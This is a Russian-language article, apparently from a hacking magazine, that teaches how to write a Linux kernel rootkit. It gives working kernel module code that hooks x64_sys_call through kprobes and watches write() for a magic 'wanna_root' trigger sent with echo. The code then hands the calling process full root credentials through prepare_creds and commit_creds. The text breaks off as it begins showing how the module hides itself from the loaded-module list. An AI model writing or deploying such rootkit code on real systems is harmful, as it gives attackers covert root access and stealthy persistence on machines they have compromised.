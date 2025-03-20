Рут­киты для Linux извес­тны уже доволь­но дав­но, они отли­чают­ся высокой изощ­ренностью архи­тек­туры, спо­соб­ны эффектив­но перех­ватывать сис­темные вызовы и мас­кировать свое при­сутс­твие в сис­теме. Сегод­ня мы попыта­емся написать собс­твен­ный Linux-рут­кит, что­бы на его при­мере изу­чить клю­чевые механиз­мы работы таких вре­донос­ных прог­рамм.

Не­дав­но я нат­кнул­ся на но­вость, опуб­ликован­ную в жур­нале «Хакер», где говори­лось, что обна­ружен новый Linux-рут­кит Pumakit. С ядром ОС Linux я никог­да ранее не стал­кивал­ся, и идея разоб­рать­ся в нем бук­валь­но пог­лотила меня. В статье я попыта­юсь опи­сать осо­бен­ности, которые мне уда­лось выявить при написа­нии собс­твен­ного рут­кита под сов­ремен­ные ядра Linux вер­сий 5.x и 6.x (x86_64).

Патч, мешающий жить

Ког­да я иссле­довал рут­киты для Linux, то неод­нократ­но посещал GitHub в поис­ках подоб­ных прог­рамм, что­бы при­мер­но понимать их струк­туру и фун­кци­ональ­ные воз­можнос­ти. И вот что мне бро­салось в гла­за: прак­тичес­ки во всех реали­заци­ях рут­китов исполь­зует­ся метод перех­вата syscall’ов путем переза­писи таб­лицы сис­темных вызовов sys_call_table .

Од­нако с недав­него вре­мени этот метод боль­ше не работа­ет, пос­коль­ку сооб­щес­тво Linux-раз­работ­чиков вы­кати­ло патч, при котором упо­мяну­тая таб­лица не исполь­зует­ся:

The sys_call_table is no longer used for system calls, but kernel/trace/trace_syscalls.c still wants to know the system call address.

Kprobes всему голова

Яд­ро Linux напич­кано не толь­ко вся­кими жиз­нетво­рящи­ми вещами, оно так­же име­ет в сво­ем арсе­нале механиз­мы отладки, которые под­держи­вают­ся из ядра в ядро. С вер­сии 2.6.9 в Linux kernel появил­ся kprobes. Kprobes — это средс­тво динами­чес­кой отладки ядра, поз­воля­ющее ста­вить breakpoints на дос­тупные для записи учас­тки памяти и самос­тоятель­но обра­баты­вать их.

Син­таксис механиз­ма отладки доволь­но прос­той:

// Структура kprobe описана в файле include/ linux/ kprobes. h static struct kprobe un = { // Место, куда мы будем ставить бряк ( экспортированный ядром символ) . symbol_name = "kernel_clone" , // Обработчик бряка . pre_handler = intercept , } ; static int __init init ( void ) { // Регистрируем «пробу» register_kprobe ( & un ) ; .. . } static void __exit bye ( void ) { // Удаляем «пробу» unregister_kprobe ( & un ) ; .. . }

Кста­ти, пос­мотреть, экспор­тирован ядром сим­вол или нет, мож­но, про­читав файл kallsyms:

cat / proc/ kallsyms | grep "имя символа"

Перехватываем x64_sys_call

По­пуляр­ный рут­кит diamorphine для обще­ния с поль­зовате­лем исполь­зует перех­вачен­ный syscall — kill . Одна­ко для это­го он ста­вит хук на sys_call_table , что уже неак­туаль­но. Как же тог­да отсле­живать сис­темные вызовы? Ответ прост: перех­ват x64_sys_call .

Все дело в том, что x64_sys_call учас­тву­ет при вызове любого «сис­кола». Это некая обер­тка над каж­дым сис­темным вызовом, под­клю­чающая мак­росы, в качес­тве которых реали­зова­ны сис­темные вызовы.

// regs — аргументы системного вызова // nr — номер системного вызова long x64_sys_call ( const struct pt_regs * regs , unsigned int nr ) { switch ( nr ) { // Здесь находятся системные вызовы в качестве макросов вида SYSCALL_DEFINEX( name, args...) , // где X — количество аргументов в syscall’e #include < asm/ syscalls_64. h> default: return __x64_sys_ni_syscall ( regs ) ; } } ;

Важ­но отме­тить, что x64_sys_call так­же экспор­тирова­на ядром.

От­лично, теперь оста­лось исполь­зовать это для орга­низа­ции обще­ния с поль­зовате­лем. Прис­мотрим­ся к коман­де echo .

Echo исполь­зует в сво­ей работе write — как раз то, что нам и нуж­но. Подыто­жив ска­зан­ное, напишем обра­бот­чик команд поль­зовате­ля:

// Идентификатор команды, которую будет отлавливать обработчик команд #define ROOT "wanna_root" // Наша проба static struct kprobe un = { . symbol_name = "x64_sys_call" , // Обработчик . pre_handler = intercept , } ; static int intercept ( struct kprobe * p , struct pt_regs * regs ) { // Проверяем номер системного вызова, передаваемый в x64_sys_call if ( regs -> si == __NR_write ) { // Сохраняем параметры, передаваемые вместе с write struct pt_regs * pRegs = ( struct pt_regs * ) regs -> di ; // Если текст, переданный в echo, совпадает с именем команды, то обрабатываем ее if ( ! strncmp ( ( const char * ) ( pRegs -> si ) , ROOT , 10 ) ) { .. . Функция , выполняемая при загрузке модуля static int __init init ( void ) { .. . int err ; err = register_kprobe ( & un ) ; if ( err < 0 ) { pr_err ( "Failed to register kprobe, error: %d \ n " , err ) ; return err ; } .. . }

Здесь нам не нуж­но исполь­зовать copy_from_user , пос­коль­ку информа­ция уже находит­ся в режиме ядра.

Повышаем привилегии и удаляем себя из списка загруженных модулей

Все сис­темные вызовы осу­щест­вля­ются в кон­тек­сте про­цес­са, то есть мы можем получить дос­туп к памяти, окру­жению про­цес­са в момент выпол­нения syscall’a. Каж­дый про­цесс оли­цет­воря­ется в ядре струк­турой struct task_struct , которая име­ет доволь­но вну­шитель­ный раз­мер. Внут­ри этой струк­туры есть поле, отве­чающее за при­виле­гии про­цес­са, к которо­му мы можем обра­тить­ся.

Пос­коль­ку мы находим­ся в режиме ядра, то осо­бых проб­лем с повыше­нием при­виле­гий не име­ем. Дос­таточ­но прос­то заменить эту струк­турку сво­ей, и вуаля!

static int root_func ( void ) { struct cred * newcreds ; // Инициализация структуры newcreds = prepare_creds () ; if ( newcreds == NULL ) { pr_alert ( "can't prepare creds \ n " ) ; return 1 ; } // Выдаем себе рут newcreds -> uid . val = newcreds -> gid . val = 0 ; // euid и egid — «эффективные» привилегии, то есть привилегии запущенного процесса newcreds -> euid . val = newcreds -> egid . val = 0 ; newcreds -> suid . val = newcreds -> sgid . val = 0 ; newcreds -> fsuid . val = newcreds -> fsgid . val = 0 ; // Вносим свои изменения commit_creds ( newcreds ) ; return 0 ; }

info Что­бы избе­жать кон­флик­та, при раз­работ­ке ядер­ных модулей сле­дует опи­сывать все свои фун­кции и гло­баль­ные перемен­ные с прис­тавкой static . Это необ­ходимо, пос­коль­ку ядро экспор­тиру­ет все сим­волы в гло­баль­ную область видимос­ти и поль­зователь может выз­вать сво­им неак­курат­ным поведе­нием кон­фликт имен.

Что каса­ется само­уда­ления из спис­ка заг­ружен­ных модулей — дело нес­коль­ких стро­чек кода. Наш рут­кит пред­став­ляет собой kernel object file , который так­же пред­став­лен сво­ей струк­турой в памяти ядра. Мы прос­то уда­ляем себя из связ­ного спис­ка заг­ружен­ных модулей: